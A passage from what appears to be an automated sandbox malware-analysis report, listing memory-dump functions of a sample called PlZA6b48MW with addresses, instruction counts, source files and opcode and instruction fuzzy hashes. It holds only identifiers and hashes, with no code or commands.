                                                                            • Opcode Fuzzy Hash: 8674ee36d74d2b9da15ab3a7dea6feb111ab657727f8e7b1cd7da532716c1a36
                                                                            • Instruction Fuzzy Hash: A4411A71E1964E9FDB59DFA4C4A59FDB7B1FF44300F1140AED01AA72A6CA392A02CB50
                                                                            Function 00007FFD9B8B3AE9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: aab9fef29f9b8c255aa64399f18a2c5f730d22e4959866d0c534b95991241652
                                                                            • Instruction ID: d9596c3f5642eca637aca59428efd02c59ead47a4caec7d45c71ffe3258c4756
                                                                            • Opcode Fuzzy Hash: aab9fef29f9b8c255aa64399f18a2c5f730d22e4959866d0c534b95991241652
                                                                            • Instruction Fuzzy Hash: 87F0A03060E7C44FC7169A3488294147F60EF6720034A52EFC045CF1A3DA188885C701
                                                                            Function 00007FFD9B8BB0C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 12cbb1bcd3f0c2040fa9ba211ceb924aea3d7fc1e5f3a3aa9fc893922ffafc36
                                                                            • Instruction ID: 2b49d18c394addee507a1a95eb312cc845775e28e6b013493c184e79d5290e45
                                                                            • Opcode Fuzzy Hash: 12cbb1bcd3f0c2040fa9ba211ceb924aea3d7fc1e5f3a3aa9fc893922ffafc36
                                                                            • Instruction Fuzzy Hash: 1FF0307150F7D44FDB169A3488698547FA0EE6721174A52EFC045CB1A7DA199889C701
                                                                            Function 00007FFD9B893B59 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 9768825aa0afe0cac63e407d65c54f5a4e50f64c2ea36600848f6e0cc6421e46
                                                                            • Instruction ID: 1fb261ecc66a7b163f4b057241092078cfc30a656b2c0142c6f72c6fb3c4569b
                                                                            • Opcode Fuzzy Hash: 9768825aa0afe0cac63e407d65c54f5a4e50f64c2ea36600848f6e0cc6421e46
                                                                            • Instruction Fuzzy Hash: ACE09271A0E7C48FCB16EB788868454BFA1EF6721174A41EFC086CF1A3EA2DC885C701
                                                                            Function 00007FFD9B8BF2A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: a740e1ec56bbb9088af0989fa77e2c33e66e0537d5d755b53a9ec9775ec2cca3
                                                                            • Instruction ID: 340921155e10495ef61b338fbd1f43965e29a0d8b7de05c097d85df4edc2e77e
                                                                            • Opcode Fuzzy Hash: a740e1ec56bbb9088af0989fa77e2c33e66e0537d5d755b53a9ec9775ec2cca3
                                                                            • Instruction Fuzzy Hash: 83E06D61A0F7C44FC71AAB748869454BFA0EF6720174A52EEC045CF1A3EA2D8889CB01
                                                                            Function 00007FFD9B8BB159 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 895d405751173384833ba20ad23c7eb90c38cd7c6bf408977422b19cb3cf1ce1
                                                                            • Instruction ID: f87a5eff0510c62cfe9076142d8dba8ed0ad0b29998d5f631a814e4abe190192
                                                                            • Opcode Fuzzy Hash: 895d405751173384833ba20ad23c7eb90c38cd7c6bf408977422b19cb3cf1ce1
                                                                            • Instruction Fuzzy Hash: 74E06D3064E3C44FC71AAB3488698547F60EE6721134A42EFC445CF1A3DA2D888ACB11
                                                                            Function 00007FFD9B8B2899 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: f0677b7bbc688d57e075adbe3dc088405d590d17517c6c64e1e9f3f73fb9d4cd
                                                                            • Instruction ID: 664272f955290ce120fe354720f4aab8d0a15ad7283893d5a154e606be5b90b1
                                                                            • Opcode Fuzzy Hash: f0677b7bbc688d57e075adbe3dc088405d590d17517c6c64e1e9f3f73fb9d4cd
                                                                            • Instruction Fuzzy Hash: 01E06D3060A3804FCB1AEB348468855BF60EF6720174A42EEC056CB1A7DA2DD886CB41
                                                                            Function 00007FFD9B8B2F29 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 556e3e425304316e7c1afa5556a8a27e0a9bcba6a5ebda62b54a1ba1c29d09d6
                                                                            • Instruction ID: 70d4ab1f88c64f492ea838151c9851ff305c470dd881b3ac0311ede5c74ec474
                                                                            • Opcode Fuzzy Hash: 556e3e425304316e7c1afa5556a8a27e0a9bcba6a5ebda62b54a1ba1c29d09d6
                                                                            • Instruction Fuzzy Hash: A6E0E56154F3D44FCB56AB7588668443FA0AE6B25078B42EAC085CF1F3E629984ACB11
                                                                            Function 00007FFD9B893BE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: e7ada0b23aaa033badc2362ad47223f9e443d77f1be492f43389db49ad523153
                                                                            • Instruction ID: f71238f4bdeb26c982dff4ddbf311331bcbd093b12398d51497ce4edbc060eb2
                                                                            • Opcode Fuzzy Hash: e7ada0b23aaa033badc2362ad47223f9e443d77f1be492f43389db49ad523153
                                                                            • Instruction Fuzzy Hash: 22E0E57154F3D44FCB16AB7488668493FA0AE6B21178A41EEC189CF1F3E6299889C701
                                                                            Function 00007FFD9B8B4959 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 500a454aeb7b8217c4b82240f445a0e1efd35b5d461e36da9ba8d5cb9b6d5251
                                                                            • Instruction ID: 49ffc727a4eecb58c421898807ba9b8ba5e1b412ae98bdadf7915142255fb363
                                                                            • Opcode Fuzzy Hash: 500a454aeb7b8217c4b82240f445a0e1efd35b5d461e36da9ba8d5cb9b6d5251
                                                                            • Instruction Fuzzy Hash: EFE0E56154F7D44FCB16AB75886A8497FA1AE6B21078A41EEC086CF1B3E6299849C701
                                                                            Function 00007FFD9B8B2929 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: e6d44813eb3488264c4356b198eaa2f72a3b982d87985ff6bf74b5178c74cf89
                                                                            • Instruction ID: 8508d6c1a84792911da49d55c7410654d3a21446920c90e130b4aa38460551e3
                                                                            • Opcode Fuzzy Hash: e6d44813eb3488264c4356b198eaa2f72a3b982d87985ff6bf74b5178c74cf89
                                                                            • Instruction Fuzzy Hash: 52E01A6154F7D44FCB16EB7488698447FA0AE6B21178B41EEC089CF1B3E62D8849CB11
                                                                            Function 00007FFD9B8BB699 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 2c62b76faf83bbdb87f6c4ba0200dfd286ad871b4d0b64a5c0891d3f2f3b2084
                                                                            • Instruction ID: 66dece9ca908f9e4a5a1e755d15f3a266b3b81b52a335747cbb6bf3c51244093
                                                                            • Opcode Fuzzy Hash: 2c62b76faf83bbdb87f6c4ba0200dfd286ad871b4d0b64a5c0891d3f2f3b2084
                                                                            • Instruction Fuzzy Hash: FAE01A6054E3C04FCB06EB7488798453F609E6721178B41EEC089CF1B3E62E8949C712
                                                                            Function 00007FFD9B8B8E0A Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 19dbaea44153af380905fcfdd7056358f070803d88dd75afee91a1b3d4d38c00
                                                                            • Instruction ID: 7b078bbb8d8508728165271e17e07a4c91195871bd4aabee4ad483d134082220
                                                                            • Opcode Fuzzy Hash: 19dbaea44153af380905fcfdd7056358f070803d88dd75afee91a1b3d4d38c00
                                                                            • Instruction Fuzzy Hash: F2D05E7154B6A44FCF18EF79846AC147F90EF6A34078A45ECC04ACF1B2EA29D986CB40
                                                                            Function 00007FFD9BC73441 Relevance: .4, Instructions: 409COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 799aa34e17fe77b39eb2f855553cf14ce46eae1d6bd40e87be8f2d02533ea294
                                                                            • Instruction ID: c32a0a910cb2d8777f1d25ca95e05b4b36159d8f600e5d89e9047800a083124c
                                                                            • Opcode Fuzzy Hash: 799aa34e17fe77b39eb2f855553cf14ce46eae1d6bd40e87be8f2d02533ea294
                                                                            • Instruction Fuzzy Hash: CBD1E530B0EA4A4FD369CB78D4E157977E1FF84310B15457EC48EC76A2DE29BA428741
                                                                            Function 00007FFD9B8C0F89 Relevance: .3, Instructions: 334COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f6cb55358da0f57cd8ac1a342418954e2ca6d87cc0f05f271ada9aa292079e6
                                                                            • Instruction ID: 5e40fdba72a922ab546a043557d1e12899e0b7accc1f24451be1802be43a6da3
                                                                            • Opcode Fuzzy Hash: 2f6cb55358da0f57cd8ac1a342418954e2ca6d87cc0f05f271ada9aa292079e6
                                                                            • Instruction Fuzzy Hash: 1A910772B1DA4D4FEFA8FB5C94A5AB877E1EF98740B11017BD00DC7292DE24AD428780
                                                                            Function 00007FFD9BC76CC2 Relevance: .3, Instructions: 308COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 180d66ac5ee837bca8f050d3c7f4512313f4d1db2a92ad8afc324c6499ff25a6
                                                                            • Instruction ID: edc0f6a5ecf7652bd4dd06a5b5eaf68925f3245114edf56ef0958887bef0bc3e
                                                                            • Opcode Fuzzy Hash: 180d66ac5ee837bca8f050d3c7f4512313f4d1db2a92ad8afc324c6499ff25a6
                                                                            • Instruction Fuzzy Hash: 99B1C430719A4A8FE759DF78C0E06A8B7A1FF58310F558179E04EC7A96CB28F951CB90
                                                                            Function 00007FFD9BC71CB2 Relevance: .3, Instructions: 306COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0cbf07677a18503d55e34891db710b053a7c0d07e0668aac2ff5962b18222b29
                                                                            • Instruction ID: e246677ec5d93e734008b26d3b6a809ee272e457b5c5f4c3b9e106fa5b226a4a
                                                                            • Opcode Fuzzy Hash: 0cbf07677a18503d55e34891db710b053a7c0d07e0668aac2ff5962b18222b29
                                                                            • Instruction Fuzzy Hash: 02B1E630B09A4A4FE759DF68C0E06A8B7A1FF55310F558179C44EC7A96CB38F951CB80
                                                                            Function 00007FFD9B8C0678 Relevance: .3, Instructions: 277COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 38b6b403bda8ebe97cd2061ce42729875fe8fc1939c337d1e7de02875ef84652
                                                                            • Instruction ID: d7dd097f0b1e496dcf01a2a2b5f5c76d34bd72f86cea77fd51546a2a68d73c70
                                                                            • Opcode Fuzzy Hash: 38b6b403bda8ebe97cd2061ce42729875fe8fc1939c337d1e7de02875ef84652
                                                                            • Instruction Fuzzy Hash: 8971B27171DA0A4FE768FB58E8919B1B3D2FF9931071502BAD04EC35A6EE25F8428781
                                                                            Function 00007FFD9BC711E6 Relevance: .3, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d384e125bb9464853042817f6216de812c32b9227f69698de55171c55a6259d
                                                                            • Instruction ID: 397c97efe5817cf43aceea700a641afe6bbd01f5e2f21b147e8fdec1c3d2b481
                                                                            • Opcode Fuzzy Hash: 7d384e125bb9464853042817f6216de812c32b9227f69698de55171c55a6259d
                                                                            • Instruction Fuzzy Hash: BD817931B0EA4A4FE3789AB894E147D77E0EF85361B16057ED48FC35A2DE28B9028741
                                                                            Function 00007FFD9B8C0DAD Relevance: .3, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d295b9317c061fc977883a3760d5daf35d4b2e9a325c8c54ab89274d6ac845ca
                                                                            • Instruction ID: 92e27fe093d61033d29a8caddbd62e007156a7f472832e997411c114d53a7f95
                                                                            • Opcode Fuzzy Hash: d295b9317c061fc977883a3760d5daf35d4b2e9a325c8c54ab89274d6ac845ca
                                                                            • Instruction Fuzzy Hash: D6612B62B2EE4E0FE7A9A76C983157577E1FF9979070502FBD04DC31A6DE14AD024341
                                                                            Function 00007FFD9BC74339 Relevance: .2, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 90d10a4bd7f3b212909e740fbc960ace3303998a25a3a7e7ec4e8744b9990a4b
                                                                            • Instruction ID: 64719b7af666136f443553e77f75378a64f49f45579eea78ed97dd4627b413fc
                                                                            • Opcode Fuzzy Hash: 90d10a4bd7f3b212909e740fbc960ace3303998a25a3a7e7ec4e8744b9990a4b
                                                                            • Instruction Fuzzy Hash: CC711635B0E54D5FE778DA7884B65BC37C0FF44311B2602BDD49EC75B2DA28AA068781
                                                                            Function 00007FFD9B8C133D Relevance: .2, Instructions: 235COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53f7659f640fb287450fac863d2d8743a6171ce1b46f784497e5bc1e9a4312ac
                                                                            • Instruction ID: 1930148e916b7f8c1e324b0f7efe8ad4224295e1826700cf2bc4e5282fe8a232
                                                                            • Opcode Fuzzy Hash: 53f7659f640fb287450fac863d2d8743a6171ce1b46f784497e5bc1e9a4312ac
                                                                            • Instruction Fuzzy Hash: 2661E471719E0A4FDBA9FB5894A1971B3E2FF6871071502BAD04EC76A6DE24FC428780
                                                                            Function 00007FFD9BC78451 Relevance: .2, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76e041508ed941c05f71b75c678d754b74578b80c064a581c077ccbe00da1cdd
                                                                            • Instruction ID: c0932addddfdc6326b75777df1ed6ee16138d910ce2d87fdfb37875428b8db8c
                                                                            • Opcode Fuzzy Hash: 76e041508ed941c05f71b75c678d754b74578b80c064a581c077ccbe00da1cdd
                                                                            • Instruction Fuzzy Hash: 6561E730B0AB0A8FE3A4DB65C1E057977E1FF44310B55497EC48AC7AA2DB79B942CB40
                                                                            Function 00007FFD9B8BDB08 Relevance: .2, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3772c54a15f36fbd61df6480fdeb75a1562306c4f746c67b227fc00c52261ed1
                                                                            • Instruction ID: 05bd383366237c752111d208da59c4cf09268a487b5941c4b5d88713393dc9df
                                                                            • Opcode Fuzzy Hash: 3772c54a15f36fbd61df6480fdeb75a1562306c4f746c67b227fc00c52261ed1
                                                                            • Instruction Fuzzy Hash: 2F51D331E09A1E4BEB58CBA888755BDB7E2FF8C304F15017AE05DE3292CB346901CB91
                                                                            Function 00007FFD9B8B829F Relevance: .2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a750637f1cd35b284496f6d42462e6ed8c4dc0e1ca484c274029565988eebee
                                                                            • Instruction ID: 92df0f9d46092d62f82ed4ce15ee552a6c1bc094c168db9eea211f30caa1069f
                                                                            • Opcode Fuzzy Hash: 7a750637f1cd35b284496f6d42462e6ed8c4dc0e1ca484c274029565988eebee
                                                                            • Instruction Fuzzy Hash: EB51B230B08A198FE7A8EF68C8A5A757392FF88314F150179D41D872D6CE35BD42CB81
                                                                            Function 00007FFD9B8C4440 Relevance: .2, Instructions: 171COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6233bd2ddd719b1feaf9be6c4ce4fd79c555843a8a89a5732a8b2c9e658c1df8
                                                                            • Instruction ID: 0f090762f08fd5808df96a19a38557cb884b26557b6112987eed4aad4f85a615
                                                                            • Opcode Fuzzy Hash: 6233bd2ddd719b1feaf9be6c4ce4fd79c555843a8a89a5732a8b2c9e658c1df8
                                                                            • Instruction Fuzzy Hash: BB412661B4EA4D0FE7A9BB6858761757BD1EF9C210F0501BBE44DC32E3ED186D068342
                                                                            Function 00007FFD9BC74EFB Relevance: .2, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1a19f5b91d5d2831180d2a58c52f476819d308b52b0d76b541fecfb741f69e8
                                                                            • Instruction ID: 9eb1092ab81f90bed38d7e188c612fa5e6a22d09b8392143829dd9e6e58d9a6b
                                                                            • Opcode Fuzzy Hash: c1a19f5b91d5d2831180d2a58c52f476819d308b52b0d76b541fecfb741f69e8
                                                                            • Instruction Fuzzy Hash: EC51AE30E1A64E9EEBA5DBB488A49BCBBB0FF45300F5105B9D01ED71E6DA386A41C741
                                                                            Function 00007FFD9BC7761F Relevance: .2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d83d9f3ba18bf16a8dc129a4013cd135d6a54c356ff886befaccfab836b2e71
                                                                            • Instruction ID: 95f09aa6b75d68b31c98fcaa56ab1f8f244dc0666718bcdffed71832173ee5a4
                                                                            • Opcode Fuzzy Hash: 6d83d9f3ba18bf16a8dc129a4013cd135d6a54c356ff886befaccfab836b2e71
                                                                            • Instruction Fuzzy Hash: 0B51FA3061A6498FE749CF18C0E05B43BA5FF45310B5451FEC85ACB69BD778E482CB40
                                                                            Function 00007FFD9BC7260F Relevance: .2, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ffa7359fab82a152487c0e9c5f1f6c747e29e9bd9479b9a7ce6f8b8dd715c04d
                                                                            • Instruction ID: 84a1bcd0c46e2ea5a0900cc67af26f336fc98ee9d4b443dd22ea47db34cdc57f
                                                                            • Opcode Fuzzy Hash: ffa7359fab82a152487c0e9c5f1f6c747e29e9bd9479b9a7ce6f8b8dd715c04d
                                                                            • Instruction Fuzzy Hash: 5B51B33061A6458FEB99CF68C0E06B43BA5FF46310B9551FDC84ACF69BD638E482CB41
                                                                            Function 00007FFD9BC76244 Relevance: .1, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
